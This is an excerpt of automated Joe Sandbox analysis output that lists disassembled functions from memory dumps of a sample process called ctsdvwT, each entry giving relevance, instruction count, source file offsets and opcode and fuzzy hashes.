                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR^q
                                            • API String ID: 0-2625958711
                                            • Opcode ID: fa5e0edb0b5a78e8c8d797a687462f68cc3cba5de8ddeeae770edef2754c5d0c
                                            • Instruction ID: 272eb848f7a98d44390f4e05ffd9a1c2907559c8d548e61e1ac94e6216521891
                                            • Opcode Fuzzy Hash: fa5e0edb0b5a78e8c8d797a687462f68cc3cba5de8ddeeae770edef2754c5d0c
                                            • Instruction Fuzzy Hash: 092165317001559FCB15BB3DD06139EBBA2EF85744F108869E045CB389EE78CC86C782
                                            Function 01398E70 Relevance: .4, Instructions: 409COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8475feefcf794de0f592841cd7511bf6061ce4d742694818a7e92e7f53976f5f
                                            • Instruction ID: 7f225955225c60d9527549e802e46321cd41b288d4508f0fadd817f8456af172
                                            • Opcode Fuzzy Hash: 8475feefcf794de0f592841cd7511bf6061ce4d742694818a7e92e7f53976f5f
                                            • Instruction Fuzzy Hash: 94E1BF30B002098FDF15DBA8D994BAEBBB2FB89318F148469E406D7395DB35DC42CB91
                                            Function 01397780 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d4460dac9d1398285aa82a9332f659c98dc1ef1fd8a191beabf41bf45dfcd19
                                            • Instruction ID: fb72eed6d1f6156ddcd8e2248b7fb25cb8af9b3ab3b9754b77c15751d5607bb4
                                            • Opcode Fuzzy Hash: 2d4460dac9d1398285aa82a9332f659c98dc1ef1fd8a191beabf41bf45dfcd19
                                            • Instruction Fuzzy Hash: 93B1503070010A9FCF25A72CD49462973A2FB96258B508E39D406CB799DF39EC86CB91
                                            Function 01394A9C Relevance: .3, Instructions: 263COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 94abe924ef9b750b2ce7ad3985ef8f1d2fd6abdf577c08397ad580c7812fa70e
                                            • Instruction ID: 1f447e00f27b713fa6b3deffe8c4400b32d82e89fcca933bc697d2c4b1e8d37a
                                            • Opcode Fuzzy Hash: 94abe924ef9b750b2ce7ad3985ef8f1d2fd6abdf577c08397ad580c7812fa70e
                                            • Instruction Fuzzy Hash: FCB15A70E1024A9FDF10CFA8DA857DDBBF1AF48318F148529D859E7294EB749886CF81
                                            Function 01398E5C Relevance: .2, Instructions: 240COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b5ef5b54d210af7977f44020703f154e0c352ece76712cf08859687b2799f6a8
                                            • Instruction ID: eb20b37a032c77b95199fa8aa9f9d49a09c3c2d62e373b0fe15fee7dff920b95
                                            • Opcode Fuzzy Hash: b5ef5b54d210af7977f44020703f154e0c352ece76712cf08859687b2799f6a8
                                            • Instruction Fuzzy Hash: F5919D74A002099FDF15DBA8D988AADBBF2FF88318F148569E506E7355DB31DC42CB90
                                            Function 01399398 Relevance: .2, Instructions: 212COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e232be21bf01a63c2dbaeea8aa3accddbf9369e90ae6f5f8bce28d8aecae5460
                                            • Instruction ID: 523bc204a6fe01f344a4d97b7b24dd78ac6c0d99ee9a325d250ee479e426f17e
                                            • Opcode Fuzzy Hash: e232be21bf01a63c2dbaeea8aa3accddbf9369e90ae6f5f8bce28d8aecae5460
                                            • Instruction Fuzzy Hash: 53714971A00205CFDB14DFA9D984B9EBBB6FF88318F14C169E909AB395DB71D844CB90
                                            Function 01396CF0 Relevance: .1, Instructions: 132COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ec2a216ee25ba0788af91dceda9310208e99831c4344ea2efd4fe3ed014e11f3
                                            • Instruction ID: a30edeaa6b651f0f5461c7eee0ecf05bae63d9312b3546c5a9d5331211b57103
                                            • Opcode Fuzzy Hash: ec2a216ee25ba0788af91dceda9310208e99831c4344ea2efd4fe3ed014e11f3
                                            • Instruction Fuzzy Hash: F55113B0D012188FDF18CFA9C985B9DBBB5BF48318F14812EE819AB351D774A845CF95
                                            Function 01396CE6 Relevance: .1, Instructions: 132COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 146f892c2e042e5a9eacdfee948f41728bf0cdbba9b2ba603afbb668543a8161
                                            • Instruction ID: f3672153f9b381391eb43eaa626a223c4ff1be10d6f4b804a6bd2c7c34f71019
                                            • Opcode Fuzzy Hash: 146f892c2e042e5a9eacdfee948f41728bf0cdbba9b2ba603afbb668543a8161
                                            • Instruction Fuzzy Hash: F55123B0D012188FDF18CFA9C985B9DBBB1BF48318F14812EE819AB355D774A844CF95
                                            Function 0139112A Relevance: .1, Instructions: 118COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9039f18ac942d6f34b652169ad5d1c5f6656d9eceae19fefeaa678581eeb06a8
                                            • Instruction ID: e24430ae73fdd82926c328c7ef6209798a2b21145986ddb484be97e8620dd898
                                            • Opcode Fuzzy Hash: 9039f18ac942d6f34b652169ad5d1c5f6656d9eceae19fefeaa678581eeb06a8
                                            • Instruction Fuzzy Hash: 0651E57120124ADFC766EB68F9A1D547BB5FBB1304B448979D0048B33EDB346D49CB94
                                            Function 01391138 Relevance: .1, Instructions: 112COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b749ad8902fddf3f785177ec5b43668233e2cff4eb3868a7ec44f4a8b875f3f2
                                            • Instruction ID: 67c5192165b5f88dd7c39fff4924a3e2fe2c40add7eb801a722149f69ebffd35
                                            • Opcode Fuzzy Hash: b749ad8902fddf3f785177ec5b43668233e2cff4eb3868a7ec44f4a8b875f3f2
                                            • Instruction Fuzzy Hash: 4C51E57120214ADFC766EB68F9A1D587BB6FBB2304B448979D0048B33EDB306D49CB94
                                            Function 013926EC Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a8bba943e38732ad3d429a450695bf4df8d17dd491e2e980343457b918fd94d4
                                            • Instruction ID: ac9784f8dcd18d79cd1c875224e73e592044c525a23621b273d3388bb3ece8f4
                                            • Opcode Fuzzy Hash: a8bba943e38732ad3d429a450695bf4df8d17dd491e2e980343457b918fd94d4
                                            • Instruction Fuzzy Hash: C24101B1D003499FDB10CFA9C484ADEBFF5EF48314F248029E819AB254DB759986CF90
                                            Function 0139ED88 Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 40a49d20323a97287138850aead1757cdb44c22a3250f8c1383e00358ab56955
                                            • Instruction ID: e2ea4736262a2a37124d92fd799f0750b8eb9eaa31b9d23da84124cae3301177
                                            • Opcode Fuzzy Hash: 40a49d20323a97287138850aead1757cdb44c22a3250f8c1383e00358ab56955
                                            • Instruction Fuzzy Hash: C5316375E006069BCF15DFA9D49479EB7B2FF89304F148929E81AE7341DB70AC42CB90
                                            Function 0139ED98 Relevance: .1, Instructions: 91COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 47206ef7218ae72cb6f9728d0ece3d9c083efe83561eaeb6c5e0bb971fbdf82d
                                            • Instruction ID: 6fe66434c6dea5aa9b6f0086d298463c963d26d972d1188aa9d50e42a4aea0d5
                                            • Opcode Fuzzy Hash: 47206ef7218ae72cb6f9728d0ece3d9c083efe83561eaeb6c5e0bb971fbdf82d
                                            • Instruction Fuzzy Hash: 85316034E006069BCF15DFA9D49469EB7B2FF89304F148929E81AE7341DB70AC42CB90
                                            Function 013926F8 Relevance: .1, Instructions: 90COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7191e5d1c8479d7fad7b90e64b03957868ec4195c156397cb6b5cefa9c60e352
                                            • Instruction ID: bfdc9977fe87c7024cc3e3e09690d80ce262ce71a5eb16561a3eead4d0360870
                                            • Opcode Fuzzy Hash: 7191e5d1c8479d7fad7b90e64b03957868ec4195c156397cb6b5cefa9c60e352
                                            • Instruction Fuzzy Hash: B241EEB0D00349AFDB14DFA9C584ADEBFB5EF48314F108029E819AB254DB75A989CB90
                                            Function 01398D49 Relevance: .1, Instructions: 82COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d8d4bc61d4334c22e676845d234b4866eb0b0c5db39113dedeb0f38c40a2f6f0
                                            • Instruction ID: aa8a74bc2af032d8bdf292f5ebb8414f78aacc1fdf95c5c7d16f5439d1d4b4ca
                                            • Opcode Fuzzy Hash: d8d4bc61d4334c22e676845d234b4866eb0b0c5db39113dedeb0f38c40a2f6f0
                                            • Instruction Fuzzy Hash: 1B316171E1020E9BDF19DFA8D89469EF7B2FF8A304F148559E409EB341DB709846CB90
                                            Function 01398D58 Relevance: .1, Instructions: 78COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9bc2862ab516c6a27954cb0e677279dc61547efe50492d28ba4c882378ae2f0
                                            • Instruction ID: 73da8b3d7c202f2b5e6a41c9787d24c2b59aec53fc651bc9e9ecbf74a7039447
                                            • Opcode Fuzzy Hash: f9bc2862ab516c6a27954cb0e677279dc61547efe50492d28ba4c882378ae2f0
                                            • Instruction Fuzzy Hash: 4C216271E1020E9BDF15DFA9D89469EF7B2FF8A304F148659E405EB341DB709846CB90
                                            Function 013916B0 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd93fcd84e5cfaca235a2caa67145eac5686d14e67d6076ac7436b7b6a488d91
                                            • Instruction ID: abd97f7ce9778a9e622f2b907b4c31f1eda1bc9c17a2b2c60d987e4b5f88df4d
                                            • Opcode Fuzzy Hash: bd93fcd84e5cfaca235a2caa67145eac5686d14e67d6076ac7436b7b6a488d91
                                            • Instruction Fuzzy Hash: 8F21B0B4A001079FDF22E72CE8A5B5E7756EB51368F104D26D40AC735EE738D8858BD2
                                            Function 01391380 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0c0cacac5254900d4948e8b42dc1b2fcf6f6730ec5662765605301ac7853a661
                                            • Instruction ID: cd27020f7c1d9a21bce8669ea51a55023f5687782e126083ecd243585aedbe33
                                            • Opcode Fuzzy Hash: 0c0cacac5254900d4948e8b42dc1b2fcf6f6730ec5662765605301ac7853a661
                                            • Instruction Fuzzy Hash: 2C21A274A401068FEF32666CD8C432DB735F7463B9F100C6AE50BE7389DA28D8948795
                                            Function 01398C48 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c4925d45326ec3dc0038286c38d4b592d77f693052768e54b5e44559a40e8f63
                                            • Instruction ID: b9df7b682187c8447ae1a584ad7e85573a14bea24b8c84ec7e59916526448773
                                            • Opcode Fuzzy Hash: c4925d45326ec3dc0038286c38d4b592d77f693052768e54b5e44559a40e8f63
                                            • Instruction Fuzzy Hash: B9217131E0020A9BDF19CFA8C4945DEF7B6AF8A308F24865AE815F7741DB709846CB51
                                            Function 01394F9A Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 190d614e1a1ab56f223627fb8406e3bba81ed0c89f064172bca6eb0de105d9d2
                                            • Instruction ID: 37b403e238b6041e08b21e0293955525aec3ab1602c695641e2aea207e78a1e7
                                            • Opcode Fuzzy Hash: 190d614e1a1ab56f223627fb8406e3bba81ed0c89f064172bca6eb0de105d9d2
                                            • Instruction Fuzzy Hash: 41213B34700209CFDB64EF78D558A9D7BF5AF49348F104469E506EB364DB32AD40CB90
                                            Function 0133D01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138279010.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_133d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0138f3b46d11c4a3377743f1c87bf6b4599671b1109656db98025e0da4b4cb1
                                            • Instruction ID: 8e79623eba891b7e394f7cf88e156b51aa5882292475c47046b0a43dba2b7369
                                            • Opcode Fuzzy Hash: f0138f3b46d11c4a3377743f1c87bf6b4599671b1109656db98025e0da4b4cb1
                                            • Instruction Fuzzy Hash: A3213070604204DFCB11DF68D980B26FBA5FB84B18F60C569E80A4B256C33AC446CA61
                                            Function 01399530 Relevance: .1, Instructions: 71COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 15aaee3b061e93cc70bc9e1aed510d4d5893c2a7eaea8f2c846ffb1a29657a94
                                            • Instruction ID: 8f0d297dad4495ada88ed1d9966aa53601e74445c46d303735308afee53275a9
                                            • Opcode Fuzzy Hash: 15aaee3b061e93cc70bc9e1aed510d4d5893c2a7eaea8f2c846ffb1a29657a94
                                            • Instruction Fuzzy Hash: E8215B71B10215DFEB14DBADC954BAE7BFAAF88718F108069E505EB3A4DA71DC008B90
                                            Function 01391898 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 76041b59ab49f2a277507c2f655c94d589882cf61c9c7a2e6731f5f0758c0f5d
                                            • Instruction ID: b1a53d58356cc15cdba0b92ace36e01b4dfdc0e2a5bb67b916a77cf40665d475
                                            • Opcode Fuzzy Hash: 76041b59ab49f2a277507c2f655c94d589882cf61c9c7a2e6731f5f0758c0f5d
                                            • Instruction Fuzzy Hash: 42213C30B0020ACFDF64EB68C5156AE77F6AB89259F100478D505FB364DB36DD40CBA1
                                            Function 01398C58 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b841e229816b16ba3250bf816b04507ab1c3e5cbd73ce8b684522d828c89034
                                            • Instruction ID: a27ecd7b9e6818995a3b931a21bb3fbefcd7049e9ebbc9b4995e482de6e1eff1
                                            • Opcode Fuzzy Hash: 0b841e229816b16ba3250bf816b04507ab1c3e5cbd73ce8b684522d828c89034
                                            • Instruction Fuzzy Hash: 2A216231E0020E9BDF19CFA8C4545DEF7B6AF8A304F24855AE815F7340DB70A845CB91
                                            Function 013916C0 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8b5cd51a4e2760639e5f9094f5a4a8af4880e3c8438947b2e25dfa894f51809f
                                            • Instruction ID: 0cca461050c701b9644518347f92cd1ccdf1f6cd7a48fbb598cb2a04f571891f
                                            • Opcode Fuzzy Hash: 8b5cd51a4e2760639e5f9094f5a4a8af4880e3c8438947b2e25dfa894f51809f
                                            • Instruction Fuzzy Hash: 3721607864010B9FDF22E72CE8A575E7756EB55368F104D22D00EC736EEB38D8858B92
                                            Function 01391888 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5fdc7188806260089a0e6e3944a37ff63988c7de351649dee8871bba2deff265
                                            • Instruction ID: 33539688c30f79fb01c89d2a36575051bbfed2f1b171b3276e36adfa86df40f7
                                            • Opcode Fuzzy Hash: 5fdc7188806260089a0e6e3944a37ff63988c7de351649dee8871bba2deff265
                                            • Instruction Fuzzy Hash: 5C215930B0020ACFDF64EB68C5556AE77F5AF89258F100878D105FB3A4DB329D00CBA1
                                            Function 01394FA8 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a250cfc1e89314af4faed9f71272f6d292206e00d825a8f9070166dfaeafd4c8
                                            • Instruction ID: f3952f41229c3ffc1bc14d347f709ec070872e93e6c00b3f94368b5c21a0d297
                                            • Opcode Fuzzy Hash: a250cfc1e89314af4faed9f71272f6d292206e00d825a8f9070166dfaeafd4c8
                                            • Instruction Fuzzy Hash: 4C213934700209CFDB68EB78C558AAD7BF5AF49308F1044A9E506EB3A4DB32AD41CB90
                                            Function 0133D006 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138279010.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_133d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: beab6543dc73b4be326283cd59cb534281c5d8f532dceed4d6695b83762cc6a3
                                            • Instruction ID: 4919f45769813ed1bcba44b682825ea4165a7a91937a41b9f43e935a09243363
                                            • Opcode Fuzzy Hash: beab6543dc73b4be326283cd59cb534281c5d8f532dceed4d6695b83762cc6a3
                                            • Instruction Fuzzy Hash: FD2153755083809FDB02CF64D994711BF71EB86618F24C5DAD8498F2A7C33A9856CB62
                                            Function 013917D0 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1bad512c1473cfca9cc0790d5ac3e3853d7918276ed7651bf8c27c59275c07bc
                                            • Instruction ID: 3a0123995d6ec68faecf48b9fac1c2620680209e6e7b9f662ce40acebca8b7d3
                                            • Opcode Fuzzy Hash: 1bad512c1473cfca9cc0790d5ac3e3853d7918276ed7651bf8c27c59275c07bc
                                            • Instruction Fuzzy Hash: 84113A72F0125A9BCB119B78984865F7FF5FB482A4F104935E909D7384EB35C801C791
                                            Function 01390848 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cb953c83f985a43943ec3c1ff78a9f0991c969a349e30b1575ba8c7966d57dc6
                                            • Instruction ID: 5d426e611ad5631b61910436c118a881ad97f7d08d5e67a71a0fe83b2c2b5ced
                                            • Opcode Fuzzy Hash: cb953c83f985a43943ec3c1ff78a9f0991c969a349e30b1575ba8c7966d57dc6
                                            • Instruction Fuzzy Hash: C211A330B042098FEF696A7CD45432E7AADEB45328F10893AF006CF356DA65DC858BD2
                                            Function 0139149A Relevance: .1, Instructions: 55COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f40c43be098b6dbb7d948ffae7ca1c7953cacebc5ce4453d5cd6f6ac3db6b74
                                            • Instruction ID: 320a150c9d0dcdaa87d67020d0f119b1955188a2bde4d9443d7dc2aa19094e9e
                                            • Opcode Fuzzy Hash: 3f40c43be098b6dbb7d948ffae7ca1c7953cacebc5ce4453d5cd6f6ac3db6b74
                                            • Instruction Fuzzy Hash: BA118232A00316CFCF65EFBC84441ADBBF5EF48228B15447AD40AF7341E635C9468BA1
                                            Function 013914A8 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c865e97c8bbc238f92715eccd445b26871ae02058e92e27a7fe61cd41ed9f58d
                                            • Instruction ID: 411a92d7285be024ac9261afbdcf11f8e8f472a5dcce7fc5429172da59825c78
                                            • Opcode Fuzzy Hash: c865e97c8bbc238f92715eccd445b26871ae02058e92e27a7fe61cd41ed9f58d
                                            • Instruction Fuzzy Hash: 97015632A00316CFCF65EFBC84541ADBBF9EF48264B150479D80AF7241E735D9468BA1
                                            Function 01391534 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 62ffeb8cc2c3c1757f7637f26a419ea7fbc2ee23b44856f2fdef46f08e7ba82e
                                            • Instruction ID: 0fe68561665fe582ea56e0535b343835433d87010db694a1fac4c01798ad731c
                                            • Opcode Fuzzy Hash: 62ffeb8cc2c3c1757f7637f26a419ea7fbc2ee23b44856f2fdef46f08e7ba82e
                                            • Instruction Fuzzy Hash: 02F0F673A04112CBDF128BA894901ACBB65EF6426975E0097D407FB652D621D542CB51
                                            Function 01397BEA Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
